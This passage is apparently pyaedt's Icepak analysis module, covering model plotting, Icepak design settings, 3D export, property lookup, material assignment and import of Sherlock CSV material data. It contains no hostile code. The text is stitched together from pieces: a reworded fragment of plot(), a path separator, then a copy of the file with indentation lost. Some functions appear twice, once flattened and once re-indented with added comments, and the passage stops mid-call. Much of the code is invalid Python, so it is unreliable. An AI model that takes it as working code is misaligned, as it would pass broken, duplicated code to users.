        force_opacity_value=None,
        clean_files=False,
    ):
        """Plot the model or a subset of its objects.

        Not supported on IronPython or on AEDT versions earlier than
        2021 R2; in those cases a warning is logged and ``None`` is
        returned implicitly.

        Parameters
        ----------
        objects : list, optional
            Optional list of objects to plot. If ``None``, all objects are exported.
        show : bool, optional
            Whether to show the plot after generation. If ``False``, the
            generated class is simply returned for more customization before plotting.
        export_path : str, optional
            If set, an image is saved to this path. If ``None``, no image is saved.
        plot_as_separate_objects : bool, optional
            Plot each object separately. This may require more time to export from AEDT.
        plot_air_objects : bool, optional
            Whether to also plot air and vacuum objects.
        force_opacity_value : float, optional
            Opacity value between 0 and 1 to apply to the whole model.
            If ``None``, the AEDT opacity of each object is applied.
        clean_files : bool, optional
            Clean the created files after plotting. The cache is maintained
            in the returned model object.

        Returns
        -------
        :class:`pyaedt.generic.plot.ModelPlotter`
            Model Object.
        """
        if is_ironpython:
            self.logger.warning("Plot is available only on CPython")
        elif self._aedt_version < "2021.2":
            self.logger.warning("Plot is supported from AEDT 2021 R2.")
        else:
            return self.post.plot_model_obj(
                objects=objects,
                show=show,
                export_path=export_path,
                plot_as_separate_objects=plot_as_separate_objects,
                plot_air_objects=plot_air_objects,
                force_opacity_value=force_opacity_value,
                clean_files=clean_files,
            )
@aedt_exception_handler
def apply_icepak_settings(
self,
ambienttemp=20,
gravityDir=5,
perform_minimal_val=True,
default_fluid="air",
default_solid="Al-Extruded",
default_surface="Steel-oxidised-surface",
):
"""Apply Icepak default design settings.
Parameters
----------
ambienttemp : float, optional
Ambient temperature, which can be an integer or a parameter already
created in AEDT. The default is ``20``.
gravityDir : int, optional
Gravity direction index in the range ``[0, 5]``. The default is ``5``.
perform_minimal_val : bool, optional
Whether to perform minimal validation. The default is ``True``.
If ``False``, full validation is performend.
default_fluid : str, optional
Default for the type of fluid. The default is ``"Air"``.
default_solid :
Default for the type of solid. The default is ``"Al-Extruded"``.
default_surface :
Default for the type of surface. The default is ``"Steel-oxidised-surface"``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oDesign.SetDesignSettings
"""
try:
AmbientTemp = str(float(ambienttemp)) + "cel"
except:
AmbientTemp = ambienttemp
IceGravity = ["X", "Y", "Z"]
GVPos = False
if int(gravityDir) > 2:
GVPos = True
GVA = IceGravity[int(gravityDir) - 3]
self.odesign.SetDesignSettings(
[
"NAME:Design Settings Data",
"Perform Minimal validation:=",
perform_minimal_val,
"Default Fluid Material:=",
default_fluid,
"Default Solid Material:=",
default_solid,
"Default Surface Material:=",
default_surface,
"AmbientTemperature:=",
AmbientTemp,
"AmbientPressure:=",
"0n_per_meter_sq",
"AmbientRadiationTemperature:=",
AmbientTemp,
"Gravity Vector CS ID:=",
1,
"Gravity Vector Axis:=",
GVA,
"Positive:=",
GVPos,
],
["NAME:Model Validation Settings"],
)
return True
@aedt_exception_handler
def export_3d_model(self, fileName, filePath, fileFormat=".step", object_list=[], removed_objects=[]):
"""Export the 3D model.
Parameters
----------
fileName : str
Name of the file.
filePath : str
Path for the file.
fileFormat : str, optional
Format of the file. The default is ``".step"``.
object_list : list, optional
List of objects to export. The default is ``[]``.
removed_objects : list, optional
The default is ``[]``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.Export
"""
if not object_list:
allObjects = self.modeler.primitives.object_names
if removed_objects:
for rem in removed_objects:
allObjects.remove(rem)
else:
if "Region" in allObjects:
allObjects.remove("Region")
else:
allObjects = object_list[:]
self.logger.info("Exporting {} objects".format(len(allObjects)))
major = -1
minor = -1
# actual version supported by AEDT is 29.0
if fileFormat in [".step", ".stp", ".sm3", ".sat", ".sab"]:
major = 29
minor = 0
stringa = ",".join(allObjects)
arg = [
"NAME:ExportParameters",
"AllowRegionDependentPartSelectionForPMLCreation:=",
True,
"AllowRegionSelectionForPMLCreation:=",
True,
"Selections:=",
stringa,
"File Name:=",
os.path.join(filePath, fileName + fileFormat),
"Major Version:=",
major,
"Minor Version:=",
minor,
]
self.modeler.oeditor.Export(arg)
return True
@aedt_exception_handler
def get_property_value(self, objectname, property, type=None):
"""Retrieve a design property value for an object.
Parameters
----------
objectname : str
Name of the object.
property : str
Name of the design property.
type : string, optional
Type of the property. Options are ``"boundary"``,
``"excitation"``, ``"setup"``, and ``"mesh"``. The default
is ``None``.
Returns
-------
type
Value of the property.
References
----------
>>> oDesign.GetPropertyValue
Examples
--------
>>> val = ipk.get_property_value('BoundarySetup:Source1', 'Total Power')
"""
boundary = {"HFSS": "HfssTab", "Icepak": "Icepak", "Q3D": "Q3D", "Maxwell3D": "Maxwell3D"}
excitation = {"HFSS": "HfssTab", "Icepak": "Icepak", "Q3D": "Q3D", "Maxwell3D": "Maxwell3D"}
setup = {"HFSS": "HfssTab", "Icepak": "Icepak", "Q3D": "General", "Maxwell3D": "General"}
mesh = {"HFSS": "MeshSetupTab", "Icepak": "Icepak", "Q3D": "Q3D", "Maxwell3D": "Maxwell3D"}
all = {
"HFSS": ["HfssTab", "MeshSetupTab"],
"Icepak": ["Icepak"],
"Q3D": ["Q3D", "General"],
"Maxwell3D": ["Maxwell3D", "General"],
}
if type == "Boundary":
propserv = boundary[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
elif type == "Setup":
propserv = setup[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
elif type == "Excitation":
propserv = excitation[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
elif type == "Mesh":
propserv = mesh[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
else:
propservs = all[self._design_type]
for propserv in propservs:
properties = list(self.odesign.GetProperties(propserv, objectname))
if property in properties:
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
return None
@aedt_exception_handler
def copy_solid_bodies_from(self, design, object_list=None, no_vacuum=True, no_pec=True):
"""Copy a list of objects from one design to the active design.
Parameters
----------
design : str
Starting application object. For example, ``'hfss1=HFSS3DLayout'``.
object_list : list, optional
List of objects to copy. The default is ``None``.
no_vacuum : bool, optional
Whether to include vacuum objects for the copied objects.
The default is ``True``.
no_pec :
Whether to include pec objects for the copied objects. The
default is ``True``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.Copy
>>> oEditor.Paste
"""
body_list = design.modeler.solid_bodies
selection_list = []
material_properties = design.modeler.primitives.objects
for body in body_list:
include_object = True
if object_list:
if body not in object_list:
include_object = False
for key, val in material_properties.items():
if val.name == body:
if no_vacuum and val.material_name == "Vacuum":
include_object = False
if no_pec and val.material_name == "pec":
include_object = False
if include_object:
selection_list.append(body)
design.modeler.oeditor.Copy(["NAME:Selections", "Selections:=", ",".join(selection_list)])
self.modeler.oeditor.Paste()
return True
@aedt_exception_handler
def assign_material(self, obj, mat):
"""Assign a material to one or more objects.
Parameters
----------
obj : str, list
One or more objects to assign materials to.
mat : str
Material to assign. If this material is not present it will be
created.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.AssignMaterial
"""
mat = mat.lower()
selections = self.modeler.convert_to_selections(obj, True)
mat_exists = False
if mat in self.materials.material_keys:
mat_exists = True
if mat_exists or self.materials.checkifmaterialexists(mat):
Mat = self.materials.material_keys[mat]
if mat_exists:
Mat.update()
self.logger.info("Assign Material " + mat + " to object " + str(selections))
for el in selections:
self.modeler.primitives[el].material_name = mat
self.modeler.primitives[el].color = self.materials.material_keys[mat].material_appearance
if Mat.is_dielectric():
self.modeler.primitives[el].solve_inside = True
else:
self.modeler.primitives[el].solve_inside = False
return True
else:
self.logger.error("Material does not exist.")
return False
@aedt_exception_handler
def assign_surface_material(self, obj, mat):
"""Assign a surface material to one or more objects.
Parameters
----------
obj : str, list
One or more objects to assign surface materials to.
mat : str
Material to assign. The material must be present in the database.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.ChangeProperty
"""
mat = mat.lower()
if mat not in self.materials.surface_material_keys:
self.logger.warning("Warning. The material is not the database. Use add_surface_material.")
return False
else:
for el in obj:
self.modeler.oeditor.ChangeProperty(
[
"NAME:AllTabs",
[
"NAME:Geometry3DAttributeTab",
["NAME:PropServers", el],
["NAME:ChangedProps", ["NAME:Surface Material", "Value:=", '"' + mat + '"']],
],
]
)
return True
@aedt_exception_handler
def _assign_property_to_mat(self, newmat, val, property):
"""Assign a property to a new material.
Parameters
----------
newmat : str
Name of the new material.
val :
Property value to assign.
property :
Name of the property.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
try:
if "@" not in val:
value = float(val)
newmat.set_property_value(property, value)
else:
value_splitted = val.split(",")
value_list = [
[
float(re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", a)[0])
for a in d.split("@")
]
for d in value_splitted
]
val0 = float(value_list[0][0])
for el in value_list:
el.reverse()
el[1] = float(el[1]) / val0
newmat.set_property_value(property, val0)
dataset = newmat.create_thermal_modifier(value_list)
newmat.set_property_therm_modifier(property, dataset)
return True
except:
return False
@aedt_exception_handler
def _create_dataset_from_sherlock(self, material_name, material_string, property_name="Mass_Density"):
mats = material_string.split(",")
mat_temp = [[i.split("@")[0], i.split("@")[1]] for i in mats]
nominal_id = int(len(mat_temp) / 2)
nominal_val = float(mat_temp[nominal_id - 1][0])
ds_name = generate_unique_name(property_name)
self.create_dataset(
ds_name,
[float(i[1].replace("C", "").replace("K", "").replace("F", "")) for i in mat_temp],
[float(i[0]) / nominal_val for i in mat_temp],
)
return nominal_val, "$" + ds_name
@aedt_exception_handler
def assignmaterial_from_sherlock_files(self, csv_component, csv_material):
"""Assign material to objects in a design based on a CSV file obtained from Sherlock.
Parameters
----------
csv_component : str
Name of the CSV file containing the component properties, including the
material name.
csv_material : str
Name of the CSV file containing the material properties.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.AssignMaterial
"""
with open(csv_material) as csvfile:
csv_input = csv.reader(csvfile)
material_header = next(csv_input)
data = list(csv_input)
k = 0
material_data = {}
for el in material_header:
material_data[el] = [i[k] for i in data]
k += 1
with open(csv_component) as csvfile:
csv_input = csv.reader(csvfile)
component_header = next(csv_input)
data = list(csv_input)
k = 0
component_data = {}
for el in component_header:
component_data[el] = [i[k] for i in data]
k += 1
all_objs = self.modeler.primitives.object_names
i = 0
for mat in material_data["Name"]:
list_mat_obj = [
"COMP_" + rd for rd, md in zip(component_data["Ref Des"], component_data["Material"]) if md == mat
]
list_mat_obj += [rd for rd, md in zip(component_data["Ref Des"], component_data["Material"]) if md == mat]
list_mat_obj = [mo for mo in list_mat_obj if mo in all_objs]
if list_mat_obj:
if not self.materials.checkifmaterialexists(mat.lower()):
newmat = self.materials.add_material(mat.lower())
else:
newmat = self.materials[mat.lower()]
if "Material Density" in material_data:
if "@" in material_data["Material Density"][i] and "," in material_data["Material Density"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Material Density"][i], "Mass_Density"
)
newmat.mass_density = nominal_val
newmat.mass_density.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Material Density"][i]
newmat.mass_density = value
if "Thermal Conductivity" in material_data:
if (
"@" in material_data["Thermal Conductivity"][i]
and "," in material_data["Thermal Conductivity"][i]
):
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Thermal Conductivity"][i], "Thermal_Conductivity"
)
newmat.thermal_conductivity = nominal_val
newmat.thermal_conductivity.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Thermal Conductivity"][i]
newmat.thermal_conductivity = value
if "Material CTE" in material_data:
if "@" in material_data["Material CTE"][i] and "," in material_data["Material CTE"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Material CTE"][i], "CTE"
)
newmat.thermal_expansion_coefficient = nominal_val
newmat.thermal_expansion_coefficient.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Material CTE"][i]
newmat.thermal_expansion_coefficient = value
if "Poisson Ratio" in material_data:
if "@" in material_data["Poisson Ratio"][i] and "," in material_data["Poisson Ratio"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Poisson Ratio"][i], "Poisson_Ratio"
)
newmat.poissons_ratio = nominal_val
newmat.poissons_ratio.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Poisson Ratio"][i]
newmat.poissons_ratio = value
if "Elastic Modulus" in material_data:
if "@" in material_data["Elastic Modulus"][i] and "," in material_data["Elastic Modulus"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Elastic Modulus"][i], "Youngs_Modulus"
)
newmat.youngs_modulus = nominal_val
newmat.youngs_modulus.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Elastic Modulus"][i]
newmat.youngs_modulus = value
self.assign_material(list_mat_obj, mat)
for obj_name in list_mat_obj:
if not self.modeler.primitives[obj_name].surface_material_name:
self.modeler.primitives[obj_name].surface_material_name = "Steel-oxidised-surface"
i += 1
all_objs = [ao for ao in all_objs if ao not in list_mat_obj]
return True
@aedt_exception_handler
def get_all_conductors_names(self):
"""Retrieve all conductors in the active design.
Returns
-------
list of str
List of conductors.
"""
cond = [i.lower() for i in list(self.materials.conductors)]
obj_names = []
for el, obj in self.modeler.primitives.objects.items():
if obj.material_name in cond:
obj_names.append(obj.name)
return obj_names
@aedt_exception_handler
def get_all_dielectrics_names(self):
"""Retrieve all dielectrics in the active design.
Returns
-------
list of str
List of dielectrics.
"""
diel = [i.lower() for i in list(self.materials.dielectrics)]
obj_names = []
for el, obj in self.modeler.primitives.objects.items():
if obj.material_name in diel:
obj_names.append(obj.name)
return obj_names | pyaedt/application/AnalysisIcepak.py | import csv
import re
import os
from pyaedt.generic.general_methods import aedt_exception_handler, generate_unique_name, is_ironpython
from pyaedt.application.Analysis import Analysis
from pyaedt.modeler.Model3D import Modeler3D
from pyaedt.modules.MeshIcepak import IcepakMesh
if is_ironpython:
from pyaedt.modules.PostProcessor import PostProcessor
else:
from pyaedt.modules.AdvancedPostProcessing import PostProcessor
class FieldAnalysisIcepak(Analysis, object):
"""Manages 3D field analysis setup in Icepak.
This class is automatically initialized by an appliation call from
HFSS, Icepak, Q3D, or Maxwell 3D. See the application function
for parameter definitions.
Parameters
----------
application : str
Application that is to initialize the call.
projectname : str, optional
Name of the project to select or the full path to the project
or AEDTZ archive to open. The default is ``None``, in which
case an attempt is made to get an active project. If no
projects are present, an empty project is created.
designname : str, optional
Name of the design to select. The default is ``None``, in
which case an attempt is made to get an active design. If no
designs are present, an empty design is created.
solutiontype : str, optional
Solution type to apply to the design. The default is
``None``, in which case the default type is applied.
setup_name : str, optional
Name of the setup to use as the nominal. The default is
``None``, in which case the active setup is used or
nothing is used.
specified_version : str, optional
Version of AEDT to use. The default is ``None``, in which case
the active version or latest installed version is used.
NG : bool, optional
Whether to run AEDT in the non-graphical mode. The default
is ``False``, in which case AEDT launches in the graphical mode.
new_desktop_session : bool, optional
Whether to launch an instance of AEDT in a new thread, even if
another instance of the ``specified_version`` is active on the
machine. The default is ``True``.
close_on_exit : bool, optional
Whether to release AEDT on exit. The default is ``False``.
student_version : bool, optional
Whether to enable the student version of AEDT. The default
is ``False``.
"""
def __init__(
self,
application,
projectname,
designname,
solutiontype,
setup_name=None,
specified_version=None,
non_graphical=False,
new_desktop_session=False,
close_on_exit=False,
student_version=False,
):
Analysis.__init__(
self,
application,
projectname,
designname,
solutiontype,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
)
self._osolution = self._odesign.GetModule("Solutions")
self._oboundary = self._odesign.GetModule("BoundarySetup")
self._modeler = Modeler3D(self)
self._mesh = IcepakMesh(self)
self._post = PostProcessor(self)
@property
def osolution(self):
"""Solution Module.
References
----------
>>> oModule = oDesign.GetModule("Solutions")
"""
return self._osolution
@property
def oboundary(self):
"""Boundary Module.
References
----------
>>> oModule = oDesign.GetModule("BoundarySetup")
"""
return self._oboundary
@property
def modeler(self):
"""Modeler.
Returns
-------
:class:`pyaedt.modeler.Model3D.Modeler3D`
"""
return self._modeler
@property
def mesh(self):
"""Mesh.
Returns
-------
:class:`pyaedt.modules.MeshIcepak.IcepakMesh`
"""
return self._mesh
@aedt_exception_handler
def plot(
self,
objects=None,
show=True,
export_path=None,
plot_as_separate_objects=True,
plot_air_objects=True,
force_opacity_value=None,
clean_files=False,
):
"""Plot the model or a substet of objects.
Parameters
----------
objects : list, optional
Optional list of objects to plot. If `None` all objects will be exported.
show : bool, optional
Show the plot after generation or simply return the
generated Class for more customization before plot.
export_path : str, optional
If available, an image is saved to file. If `None` no image will be saved.
plot_as_separate_objects : bool, optional
Plot each object separately. It may require more time to export from AEDT.
plot_air_objects : bool, optional
Plot also air and vacuum objects.
force_opacity_value : float, optional
Opacity value between 0 and 1 to be applied to all model.
If `None` aedt opacity will be applied to each object.
clean_files : bool, optional
Clean created files after plot. Cache is mainteined into the model object returned.
Returns
-------
:class:`pyaedt.generic.plot.ModelPlotter`
Model Object.
"""
if is_ironpython:
self.logger.warning("Plot is available only on CPython")
elif self._aedt_version < "2021.2":
self.logger.warning("Plot is supported from AEDT 2021 R2.")
else:
return self.post.plot_model_obj(
objects=objects,
show=show,
export_path=export_path,
plot_as_separate_objects=plot_as_separate_objects,
plot_air_objects=plot_air_objects,
force_opacity_value=force_opacity_value,
clean_files=clean_files,
)
@aedt_exception_handler
def apply_icepak_settings(
self,
ambienttemp=20,
gravityDir=5,
perform_minimal_val=True,
default_fluid="air",
default_solid="Al-Extruded",
default_surface="Steel-oxidised-surface",
):
"""Apply Icepak default design settings.
Parameters
----------
ambienttemp : float, optional
Ambient temperature, which can be an integer or a parameter already
created in AEDT. The default is ``20``.
gravityDir : int, optional
Gravity direction index in the range ``[0, 5]``. The default is ``5``.
perform_minimal_val : bool, optional
Whether to perform minimal validation. The default is ``True``.
If ``False``, full validation is performend.
default_fluid : str, optional
Default for the type of fluid. The default is ``"Air"``.
default_solid :
Default for the type of solid. The default is ``"Al-Extruded"``.
default_surface :
Default for the type of surface. The default is ``"Steel-oxidised-surface"``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oDesign.SetDesignSettings
"""
try:
AmbientTemp = str(float(ambienttemp)) + "cel"
except:
AmbientTemp = ambienttemp
IceGravity = ["X", "Y", "Z"]
GVPos = False
if int(gravityDir) > 2:
GVPos = True
GVA = IceGravity[int(gravityDir) - 3]
self.odesign.SetDesignSettings(
[
"NAME:Design Settings Data",
"Perform Minimal validation:=",
perform_minimal_val,
"Default Fluid Material:=",
default_fluid,
"Default Solid Material:=",
default_solid,
"Default Surface Material:=",
default_surface,
"AmbientTemperature:=",
AmbientTemp,
"AmbientPressure:=",
"0n_per_meter_sq",
"AmbientRadiationTemperature:=",
AmbientTemp,
"Gravity Vector CS ID:=",
1,
"Gravity Vector Axis:=",
GVA,
"Positive:=",
GVPos,
],
["NAME:Model Validation Settings"],
)
return True
@aedt_exception_handler
def export_3d_model(self, fileName, filePath, fileFormat=".step", object_list=[], removed_objects=[]):
"""Export the 3D model.
Parameters
----------
fileName : str
Name of the file.
filePath : str
Path for the file.
fileFormat : str, optional
Format of the file. The default is ``".step"``.
object_list : list, optional
List of objects to export. The default is ``[]``.
removed_objects : list, optional
The default is ``[]``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.Export
"""
if not object_list:
allObjects = self.modeler.primitives.object_names
if removed_objects:
for rem in removed_objects:
allObjects.remove(rem)
else:
if "Region" in allObjects:
allObjects.remove("Region")
else:
allObjects = object_list[:]
self.logger.info("Exporting {} objects".format(len(allObjects)))
major = -1
minor = -1
# actual version supported by AEDT is 29.0
if fileFormat in [".step", ".stp", ".sm3", ".sat", ".sab"]:
major = 29
minor = 0
stringa = ",".join(allObjects)
arg = [
"NAME:ExportParameters",
"AllowRegionDependentPartSelectionForPMLCreation:=",
True,
"AllowRegionSelectionForPMLCreation:=",
True,
"Selections:=",
stringa,
"File Name:=",
os.path.join(filePath, fileName + fileFormat),
"Major Version:=",
major,
"Minor Version:=",
minor,
]
self.modeler.oeditor.Export(arg)
return True
@aedt_exception_handler
def get_property_value(self, objectname, property, type=None):
"""Retrieve a design property value for an object.
Parameters
----------
objectname : str
Name of the object.
property : str
Name of the design property.
type : string, optional
Type of the property. Options are ``"boundary"``,
``"excitation"``, ``"setup"``, and ``"mesh"``. The default
is ``None``.
Returns
-------
type
Value of the property.
References
----------
>>> oDesign.GetPropertyValue
Examples
--------
>>> val = ipk.get_property_value('BoundarySetup:Source1', 'Total Power')
"""
boundary = {"HFSS": "HfssTab", "Icepak": "Icepak", "Q3D": "Q3D", "Maxwell3D": "Maxwell3D"}
excitation = {"HFSS": "HfssTab", "Icepak": "Icepak", "Q3D": "Q3D", "Maxwell3D": "Maxwell3D"}
setup = {"HFSS": "HfssTab", "Icepak": "Icepak", "Q3D": "General", "Maxwell3D": "General"}
mesh = {"HFSS": "MeshSetupTab", "Icepak": "Icepak", "Q3D": "Q3D", "Maxwell3D": "Maxwell3D"}
all = {
"HFSS": ["HfssTab", "MeshSetupTab"],
"Icepak": ["Icepak"],
"Q3D": ["Q3D", "General"],
"Maxwell3D": ["Maxwell3D", "General"],
}
if type == "Boundary":
propserv = boundary[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
elif type == "Setup":
propserv = setup[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
elif type == "Excitation":
propserv = excitation[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
elif type == "Mesh":
propserv = mesh[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
else:
propservs = all[self._design_type]
for propserv in propservs:
properties = list(self.odesign.GetProperties(propserv, objectname))
if property in properties:
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
return None
@aedt_exception_handler
def copy_solid_bodies_from(self, design, object_list=None, no_vacuum=True, no_pec=True):
"""Copy a list of objects from one design to the active design.
Parameters
----------
design : str
Starting application object. For example, ``'hfss1=HFSS3DLayout'``.
object_list : list, optional
List of objects to copy. The default is ``None``.
no_vacuum : bool, optional
Whether to include vacuum objects for the copied objects.
The default is ``True``.
no_pec :
Whether to include pec objects for the copied objects. The
default is ``True``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.Copy
>>> oEditor.Paste
"""
body_list = design.modeler.solid_bodies
selection_list = []
material_properties = design.modeler.primitives.objects
for body in body_list:
include_object = True
if object_list:
if body not in object_list:
include_object = False
for key, val in material_properties.items():
if val.name == body:
if no_vacuum and val.material_name == "Vacuum":
include_object = False
if no_pec and val.material_name == "pec":
include_object = False
if include_object:
selection_list.append(body)
design.modeler.oeditor.Copy(["NAME:Selections", "Selections:=", ",".join(selection_list)])
self.modeler.oeditor.Paste()
return True
    @aedt_exception_handler
    def assign_material(self, obj, mat):
        """Assign a material to one or more objects.

        Parameters
        ----------
        obj : str, list
            One or more objects to assign materials to.
        mat : str
            Material to assign (case insensitive). If this material is not
            present it will be created.

        Returns
        -------
        bool
            ``True`` when successful, ``False`` when failed.

        References
        ----------
        >>> oEditor.AssignMaterial
        """
        # Material names are stored lowercase in the material database.
        mat = mat.lower()
        selections = self.modeler.convert_to_selections(obj, True)
        mat_exists = False
        if mat in self.materials.material_keys:
            mat_exists = True
        # checkifmaterialexists is only consulted when the key is not cached;
        # presumably it also loads the material into material_keys — TODO confirm.
        if mat_exists or self.materials.checkifmaterialexists(mat):
            Mat = self.materials.material_keys[mat]
            if mat_exists:
                # Push any pending property changes of a known material to AEDT.
                Mat.update()
            self.logger.info("Assign Material " + mat + " to object " + str(selections))
            for el in selections:
                self.modeler.primitives[el].material_name = mat
                self.modeler.primitives[el].color = self.materials.material_keys[mat].material_appearance
                # Dielectrics are solved inside; conductors are not.
                if Mat.is_dielectric():
                    self.modeler.primitives[el].solve_inside = True
                else:
                    self.modeler.primitives[el].solve_inside = False
            return True
        else:
            self.logger.error("Material does not exist.")
            return False
@aedt_exception_handler
def assign_surface_material(self, obj, mat):
"""Assign a surface material to one or more objects.
Parameters
----------
obj : str, list
One or more objects to assign surface materials to.
mat : str
Material to assign. The material must be present in the database.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.ChangeProperty
"""
mat = mat.lower()
if mat not in self.materials.surface_material_keys:
self.logger.warning("Warning. The material is not the database. Use add_surface_material.")
return False
else:
for el in obj:
self.modeler.oeditor.ChangeProperty(
[
"NAME:AllTabs",
[
"NAME:Geometry3DAttributeTab",
["NAME:PropServers", el],
["NAME:ChangedProps", ["NAME:Surface Material", "Value:=", '"' + mat + '"']],
],
]
)
return True
    @aedt_exception_handler
    def _assign_property_to_mat(self, newmat, val, property):
        """Assign a property to a new material.

        Parameters
        ----------
        newmat :
            Material object to update (exposes ``set_property_value``,
            ``create_thermal_modifier`` and ``set_property_therm_modifier``).
        val : str
            Property value to assign. Either a plain scalar, or a
            temperature-dependent ``"v1@T1,v2@T2,..."`` list.
        property :
            Name of the property.

        Returns
        -------
        bool
            ``True`` when successful, ``False`` when failed.
        """
        try:
            # Plain scalar value: no temperature dependence encoded.
            if "@" not in val:
                value = float(val)
                newmat.set_property_value(property, value)
            else:
                # Temperature-dependent value: split into value@temperature pairs
                # and extract the leading numeric token from each side.
                value_splitted = val.split(",")
                value_list = [
                    [
                        float(re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", a)[0])
                        for a in d.split("@")
                    ]
                    for d in value_splitted
                ]
                # First value acts as the nominal reference.
                val0 = float(value_list[0][0])
                for el in value_list:
                    # Reorder each pair to [temperature, value] and normalize
                    # the value against the nominal.
                    el.reverse()
                    el[1] = float(el[1]) / val0
                newmat.set_property_value(property, val0)
                dataset = newmat.create_thermal_modifier(value_list)
                newmat.set_property_therm_modifier(property, dataset)
            return True
        except:
            # NOTE(review): broad except matches the module's best-effort style;
            # any parsing or assignment failure is reported as False.
            return False
@aedt_exception_handler
def _create_dataset_from_sherlock(self, material_name, material_string, property_name="Mass_Density"):
mats = material_string.split(",")
mat_temp = [[i.split("@")[0], i.split("@")[1]] for i in mats]
nominal_id = int(len(mat_temp) / 2)
nominal_val = float(mat_temp[nominal_id - 1][0])
ds_name = generate_unique_name(property_name)
self.create_dataset(
ds_name,
[float(i[1].replace("C", "").replace("K", "").replace("F", "")) for i in mat_temp],
[float(i[0]) / nominal_val for i in mat_temp],
)
return nominal_val, "$" + ds_name
@aedt_exception_handler
def assignmaterial_from_sherlock_files(self, csv_component, csv_material):
"""Assign material to objects in a design based on a CSV file obtained from Sherlock.
Parameters
----------
csv_component : str
Name of the CSV file containing the component properties, including the
material name.
csv_material : str
Name of the CSV file containing the material properties.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.AssignMaterial
"""
with open(csv_material) as csvfile:
csv_input = csv.reader(csvfile)
material_header = next(csv_input)
data = list(csv_input)
k = 0
material_data = {}
for el in material_header:
material_data[el] = [i[k] for i in data]
k += 1
with open(csv_component) as csvfile:
csv_input = csv.reader(csvfile)
component_header = next(csv_input)
data = list(csv_input)
k = 0
component_data = {}
for el in component_header:
component_data[el] = [i[k] for i in data]
k += 1
all_objs = self.modeler.primitives.object_names
i = 0
for mat in material_data["Name"]:
list_mat_obj = [
"COMP_" + rd for rd, md in zip(component_data["Ref Des"], component_data["Material"]) if md == mat
]
list_mat_obj += [rd for rd, md in zip(component_data["Ref Des"], component_data["Material"]) if md == mat]
list_mat_obj = [mo for mo in list_mat_obj if mo in all_objs]
if list_mat_obj:
if not self.materials.checkifmaterialexists(mat.lower()):
newmat = self.materials.add_material(mat.lower())
else:
newmat = self.materials[mat.lower()]
if "Material Density" in material_data:
if "@" in material_data["Material Density"][i] and "," in material_data["Material Density"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Material Density"][i], "Mass_Density"
)
newmat.mass_density = nominal_val
newmat.mass_density.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Material Density"][i]
newmat.mass_density = value
if "Thermal Conductivity" in material_data:
if (
"@" in material_data["Thermal Conductivity"][i]
and "," in material_data["Thermal Conductivity"][i]
):
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Thermal Conductivity"][i], "Thermal_Conductivity"
)
newmat.thermal_conductivity = nominal_val
newmat.thermal_conductivity.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Thermal Conductivity"][i]
newmat.thermal_conductivity = value
if "Material CTE" in material_data:
if "@" in material_data["Material CTE"][i] and "," in material_data["Material CTE"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Material CTE"][i], "CTE"
)
newmat.thermal_expansion_coefficient = nominal_val
newmat.thermal_expansion_coefficient.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Material CTE"][i]
newmat.thermal_expansion_coefficient = value
if "Poisson Ratio" in material_data:
if "@" in material_data["Poisson Ratio"][i] and "," in material_data["Poisson Ratio"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Poisson Ratio"][i], "Poisson_Ratio"
)
newmat.poissons_ratio = nominal_val
newmat.poissons_ratio.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Poisson Ratio"][i]
newmat.poissons_ratio = value
if "Elastic Modulus" in material_data:
if "@" in material_data["Elastic Modulus"][i] and "," in material_data["Elastic Modulus"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
